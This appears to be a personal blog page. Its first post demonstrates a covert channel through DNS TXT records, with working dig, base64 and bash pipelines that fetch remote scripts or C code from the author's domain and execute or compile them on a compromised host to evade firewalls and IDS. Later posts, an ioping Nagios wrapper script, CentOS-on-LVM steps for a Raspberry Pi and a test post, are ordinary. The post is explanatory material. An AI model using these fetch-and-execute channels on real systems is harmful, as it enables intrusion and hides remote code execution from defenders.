Using DNS TXT Record Abuse for Exploiting Servers

With everything thats been in the news lately with malware and WannaCry, I figured it’d be fun to proof this out for myself and post about it. The below, of course, assumes that your environment has already been compromised or has someone on it that wants to do something nefarious (disgruntled employee?). I am going to show you, in its most simplistic form, how you can abuse DNS TXT records for leveraging passing data in between servers and more so, when the server you want to exploit is behind a firewall and can only do DNS requests

Why is this useful? This is useful because data in an TXT record can be any combination of ASCII text. What this means, simply, is that you are able to obfuscate data with GPG or, even more simply, base64 encode and decode. This is beneficial for hiding from an IDS or IPS.

DNS is everything. When things fail, its usually because of a DNS issue (within context, of course) but typically DNS traffic is relatively trusted in organizations. The abuse of DNS here is being in the context of, for instance, when a DNS server does not know of a record, when asked it, will forward a request to the root zones which will then attempt to try to find the controlling DNS server for the queried domain so that it can return a result for the queried hostname

Example: I am a server inside of an organization that has the ability to issue DNS requests. What this means is that I can request google.com – my internal DNS server probably knows this already from cache and responds. What if I ask for ckozler.net? My internal DNS server probably wont know this and will forward it up to the .net root DNS to ask .net where ckozler under .net is. .net responds with NS record ns1.worldnic.com. Then ns1.worldnic.com. is queried for the @ record for ckozler.net which responds with 104.236.30.66 (the host for where you are reading this page)

So what happened here? I was able to “leave” the organization to request data from an external server and retrieve it and read it. Simply put, instead of being able to use curl or wget to request something from a remote web server, I used DNS to traverse the open internet and get input from a remote server. As I said earlier, TXT records can contain ASCII text. ASCII text means data and data means exploits.

Below I will show an example of this. I will describe the environment as well so hopefully after you reading this you can understand what is going on from a technical standpoint. It will be extremely high level, because I’m not hacker or security expert, but it will show you how you can move data between sites with DNS TXT records

The idea of obfuscating the data inside the TXT records is so that when IDS’ and IPS’ are inspecting the traffic, they arent able to really see “inside” of the response. All they see is a random array of ASCII text

DISCLAIMER: I am not a security expert or try to pose as one. I am simply showing how hackers and malware writers are able to leverage basic functions of networking that could be much harder to detect

Setup

‘client’ is an already compromised server inside an organization somewhere – whether it be a disgruntled employee or what not. The only requirement is that it can query DNS. Lets assume its locked down from outbound access to any server except the internal DNS server.

Again, there are a ton of assumptions here, I am just showing the concepts

I will show 2 examples. One is that I am fetching a remote bash script via curl and then executing it. The second is fetching C code and then compiling it and running it. Example 1 assumes HTTP/HTTPS outbound from the server is allowed and example 2 assumes the server has gcc installed

Example 1

client]$ dig -t TXT txtline1.ckozler.net | grep ^txt
txtline1.ckozler.net.	6601	IN	TXT	"Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu"

client]$ dig -t TXT txtline2.ckozler.net | grep ^txt
txtline2.ckozler.net.	7141	IN	TXT	"cGhwCg=="

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' 
Y3VybCAtcyAtcSBodHRwczovL2Nrb3psZXIubmV0L3JlbW90ZV9zaGVsbC50eHQu
cGhwCg==

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d 
curl -s -q https://ckozler.net/remote_shell.txt.php

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s 
#!/usr/bin/env bash

echo "Hello world! I was downloaded from http://ckozler.net/remote_shell.txt.php with instructions from a TXT DNS record"
exit 0

client]$ dig -t TXT txtline1.ckozler.net txtline2.ckozler.net | grep '^txt' | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d | bash -s  | bash -s
Hello world! I was downloaded from http://ckozler.net/remote_shell.txt.php with instructions from a TXT DNS record

So what happened? You can see that I can query txtline1.ckozler.net and get data…then txtline2.ckozler.net and get the second line of the base64 encoded strings. These two lines give me the lines from the bash script that is hosted at https://ckozler.net/remote_shell.txt.php. I then decode it and run it which then spits out “Hello world!”

The magic here is the base64 encoded data. Of course, I am sure IDS and IPS’ can pick this up but base64 is a good, quick, and easy way to obfuscate data and try to hide

This example just proofs the concept of how to move data or instructions in between a remote external DNS server and a “secured” internal server

Example 2

Now we’re going to fetch some C code from TXT records and run it. The previous example assumes HTTP/HTTPS (port 80 and 443) outbound towards ckozler.net is open. Well, what if this isnt the case? What if we, for instance, see that the kernel on server ‘client’ is susceptible to a privilege escalation exploit. Perfect! Lets get some code from DNS TXT records!

Note: Click the arrow in the top right to open the shell code in another window

# Get the first line of the base64 encoded C code
client]$ dig -t TXT c_code_line_1.ckozler.net | grep ^c_code_line
c_code_line_1.ckozler.net. 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"

# Get the second line
client]$ dig -t TXT c_code_line_2.ckozler.net | grep ^c_code_line
c_code_line_2.ckozler.net. 3599	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"

# Get the third line
client]$ dig -t TXT c_code_line_3.ckozler.net | grep ^c_code_line
c_code_line_3.ckozler.net. 3599	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now get them all at once
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line
c_code_line_1.ckozler.net. 3599	IN	TXT	"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"
c_code_line_2.ckozler.net. 3562	IN	TXT	"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"
c_code_line_3.ckozler.net. 3564	IN	TXT	"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# We still have quotes, want to get rid of them
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }'
"I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g"
"d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k"
"IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo="

# Now its cleaned up, its literal base64 encoded text
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }' | tr -d '"'
I2luY2x1ZGUgPHN0ZGlvLmg+CmludCBtYWluKCkgewoJcHJpbnRmKCAiaGVsbG8g
d29ybGRcbkkgd2FzIGRvd25sb2FkZWQgdGhyb3VnaCBhIFRYVCByZWNvcmQgYW5k
IGNvbXBpbGVkIGxvY2FsbHkiICk7CglyZXR1cm4gMDsKfQo=

# When we pass it to openssl -d we can see the actual text
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | awk '{ print $5 }' | tr -d '"' | openssl enc -base64 -d
#include <stdio.h>
int main() {
	printf( "hello world\nI was downloaded through a TXT record and compiled locally" );
	return 0;
}

# Now lets pass it to a file and compile it with GCC
client]$ dig -t TXT c_code_line_1.ckozler.net c_code_line_2.ckozler.net c_code_line_3.ckozler.net | grep ^c_code_line | \
> awk '{ print $5 }' | tr -d '"' | \
> openssl enc -base64 -d > /var/tmp/txt.poc.c; gcc -o /var/tmp/txt.poc /var/tmp/txt.poc.c; /var/tmp/txt.poc
hello world
I was downloaded through a TXT record and compiled locally

client]$ 

So what you can see here is we were able to successfully move C code via TXT DNS records. Of course, large exploits would require many lines but things such as shell code privilege escalation exploits would be many less lines

I hope you found this post informative. Any mistakes I made or anything not clear please feel free to drop a line in the comments

Thanks!

iomonitor – wrapper script for ioping

Link to it on my github because formatting is screwed up here

This is a wrapper script for ioping. Can be implemented in to a cronjob (ex: with https://healthchecks.io ) or as an NRPE command for nagios. Use –nagios-perfdata to generate perfdata for Nagios to consume

I needed a way to track I/O latency on a VM hypervisor node (ovirt) because one ovirt node of 3 kept reporting latency to storage but it was the only one reporting it (and guaranteed not a config issue). I set this up in nagios to run every minute and run for 15 runs which is usually ~15 seconds

This is what it looks like inside NagiosXI

 

#!/usr/bin/env bash

#
# Wrapper script for ioping. Can be implemented in to a cron
# job or as an NRPE command for nagios. Use --nagios-perfdata to generate perfdata
# for Nagios to consume
#
# I needed a way to track I/O latency on a VM hypervisor node (ovirt)
# because the ovirt engine kept reporting latencies but it was the only one
# reporting it (and guaranteed not a config issue). I set this up in nagios 
# to run every minute and run for 15 runs which is usually ~15 seconds
#
#
# It is suggested to first get a baseline for what your system looks like by
# running the script with all zeros for crit/warn then using "raw data" line 
# to generate some  values you consider warn/critical. I used a 
# count of 120 (2 minutes) then min/max/avg * 1.5 for warning and * 2.5 for critical
#
#	* While running this I did the following on my home directory
#
#		while [ true ]; do ls -alhtrR $HOME; done
#
#	to generate some I/O without using DD, figured all the stat() calls would be
#	better geared towards real use 
#
#
# Example:
#
#	./iomonitor --directory /tmp --min-warn 0 --min-crit 0 --max-warn 0 --max-crit 0 --avg-warn 0 --avg-crit 0 --count 120
#


# Check dependencies
if [ -z $(command -v ioping) ]; then
	echo "* ERROR: Cannot find ioping command"
	exit 254
fi

if [ -z $(command -v bc) ]; then
	echo "* ERROR: Cannot find bc command"
	exit 254
fi


# This prints when using the -v flag
function debug_write() {
        if [ ${dbg} ]; then
                echo "* $@"
        else
                return
        fi
}


# Collect arguments
setargs(){
	while [ "$1" != "" ]; do
    		case $1 in
      			"--min-warn")
        			shift
       			 	min_warn=$1
        		;;
			"--min-crit")
				shift
				min_crit=$1
			;;

			"--max-warn")
                                shift
                                max_warn=$1
                        ;;
                        "--max-crit")
                                shift
                                max_crit=$1
                        ;;

			"--avg-warn")
                                shift
                                avg_warn=$1
                        ;;
                        "--avg-crit")
                                shift
                                avg_crit=$1
                        ;;

			"-c" | "--count" )
				shift
				count=$1
			;;
			
      			"-d" | "--directory")
				shift
        			directory="$1"
        		;;
			"--nagios-perfdata")
				perfdata=1
			;;	
			"-v" | "--verbose")
				#shift
				dbg=1
			;;
			
    		esac

    		shift
  	done
}

setargs "$@"

# Startup
debug_write "min_warn=${min_warn}"
debug_write "min_crit=${min_crit}"
debug_write "max_warn=${max_warn}"
debug_write "max_crit=${max_crit}"
debug_write "avg_warn=${avg_warn}"
debug_write "avg_crit=${avg_crit}"
debug_write "count=${count}"
debug_write "directory=${directory}"

# If count is empty, default to 15
if [ -z ${count} ]; then
	count=15
fi

# Move in to the directory for ioping to run
cd "${directory}"
cdres=$?
if [ ${cdres} -ne 0 ]; then
	echo "* ERROR: Failed to CD to ${directory} to run ioping test. Exiting"
	exit 254
fi

# Stuff
debug_write "Current directory - $(pwd)"

# Run ioping
debug_write "Running ${count} times"
cmd=$(ioping -c ${count} .)

# --verbose
debug_write "output: ${cmd}"

# Grep the line we care about
line=$(echo "${cmd}" | grep "^min/avg/max/mdev" )
debug_write "line: '${line}'"

# Now awk the fields out
data_lines=$(echo "${line}" | awk '{ print $3 " " $4 "\n" $6 " " $7 "\n" $9 " " $10 "\n" $12 " " $13 };')

# Array for data parsing
declare -a data

# Conversions
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
count=0
for i in $(echo "${data_lines}"); do
	# TODO: Make what to convert to an argument
	# we default now to seconds. People may want to monitor at ms level
	#... but I suck at math

	value=$(echo "$i" | cut -d ' ' -f1)
	unit=$(echo "$i" | cut -d ' ' -f2)
	case "${unit}" in
		ns)
			conversion="0.000000001"
		;;
		us)
			conversion="0.000001"
		;;
		ms)
			conversion="0.001"
		;;
		s)	
			conversion="1"
		;;
		m)
			conversion="60"
		;;
		h)
			conversion="3600"
		;;
		*)
			echo "* ERROR: Received unit we could not convert. Got ${unit}"
			exit 245
		;;
	esac

	debug_write "(${unit}) - ${value} * ${conversion}"
	converted=$(echo "scale=6; ${value} * ${conversion}" | bc | awk '{printf "%f", $0}')

	data[${count}]=${converted}
	count=$((${count}+1))
done
IFS=$SAVEIFS


min=${data[0]}
avg=${data[1]}
max=${data[2]}
mdev=${data[3]}
debug_write "Converted to seconds: $min / $avg / $max / $mdev"


# now check warn/crit
exit_crit=0
exit_warn=0
output=""
perfdataoutput=""

# Because im lazy and using a function is prettier
function append() {
	output="${output}$@"
}

function perfdata_append() { 
	perfdataoutput="${perfdataoutput}$@ "
}

# Use BC to do float comparison
function comp() { 
	bc <<< "$@" return $? } # Iterate the fields we need. Doing it this way avoids repeat code # Why repeat code when we can use bashes flexibility?! for i in $(echo min max avg); do # Yay bash variable substitution! # use the value when we need to and the variable name when we need to # ex: ${idx_name} would expand to min then $idx_warn would expand to min_warn # so when we use ${!idx_warn} it would expand to min_warn value (the arg input field) idx_inner_val="${!i}" idx_name="$i" idx_warn="${idx_name}_warn" idx_crit="${idx_name}_crit" debug_write "${idx_inner_val} > ${!idx_warn}" 
	debug_write "${idx_inner_val} < ${!idx_crit}" if [ $(comp "${idx_inner_val} > ${!idx_warn}" ) -eq 1 ] && [ $(comp "${idx_inner_val} < ${!idx_crit}" ) -eq 1 ]; then append " * WARNING: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_warn}\n"
		exit_warn=1
	fi
	
	if [ $(comp "${idx_inner_val} > ${!idx_crit}" ) -eq 1 ]; then
	        append " * CRITICAL: '$directory' storage latency ${idx_name} response time ${idx_inner_val} > ${!idx_crit}\n"
	        exit_crit=1
	fi

	perfdata_append "${idx_name}=${idx_inner_val}"

done

# May as well print the raw data when we print anything else or the OK
append "raw data: ${line}"


# Warn / crit / OK logic 

# Crit
if [ ${exit_crit} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
		echo -e " | ${perfdataoutput}"
	fi
	exit 2
fi

# Warn
if [ ${exit_warn} -eq 1 ]; then
	echo -e "${output}" 
	if [ ! -z "${perfdata}" ]; then
                echo -e " | ${perfdataoutput}"
        fi
	exit 1
fi

# Else OK 
echo -e "OK - ${directory} latency - ${output}" | tr -d '\n'
if [ ! -z "${perfdata}" ]; then
	echo -e " | ${perfdataoutput}"
fi


exit 0
Moving CentOS 7 to LVM on Raspberry Pi 3 / ARMv7L

I will formalize this later when I can

  1. This is purely assuming you’re using CentOS 7 on RPI3 and have DD’ed the image per their installation instructions. This assumption will lead the below
  2. Confirm your version has support via CONFIG_BLK_DEV_INITRD kernel compile option. You can check /proc/config.gz for this..if you dont have it then modprobe configs
  3. Generate an initrd – dracut -f -v /boot/initrd $(uname -r)
  4. Append ‘initramfs initrd 0x01f00000’ to /boot/config.txt
  5. Modify /boot/cmdline.txt to read initrd=0x01f00000 after root=/dev/…. and before rootfstype=ext4
  6. Reboot as a test. Note that your boot time will go from about 5-10 seconds to upwards of a minute or so. You will see the Raspberry Pi splash screen for about 5 seconds as opposed to .5 or 1 second before. This is because the Pi now needs to load the 26MB initrd in to memory before continuing
  7. If it comes back up then you can move the file system now
  8. Edit /etc/fstab and change noatime for / to be ro,noatime
  9. Reboot
  10. yum install -y lvm2
  11. fdisk /dev/mmcblk0
  12. Create a new partition and exit
  13. Reboot
  14. pvcreate /dev/mmcblk0p4
  15. vgcreate root /dev/mmcblk0p4
  16. lvcreate –name=”lv_root” -l 45%FREE root <—- more on this later
  17. mkdir /mnt/new
  18. mount /dev/mapper/root/lv_root /mnt/new
  19. Copy the file system: tar -cvpf – –one-file-system –acls –xattrs –selinux / | tar xpf – -C /mnt/new/
  20. Edit /boot/cmdline.txt root= to be root=/dev/mapper/root-lv_root
  21. Reboot

 

Test Post

Please ignore

 

/**
 * Insert your code here
 */
 #!/usr/bin/env bash
 
 for i in $(echo "${LIST}"); do
	IP=$(nslookup $i | grep -iv 10.1.10.11 | grep -i address | cut -d ":" -f2 | tr -d '\r' | xargs echo)
	if [ -z ${IP} ]; then
		IP=COULD_NOT_FIND_IP_FIND_MANUALLY
	fi
	echo "$i,${IP}"
done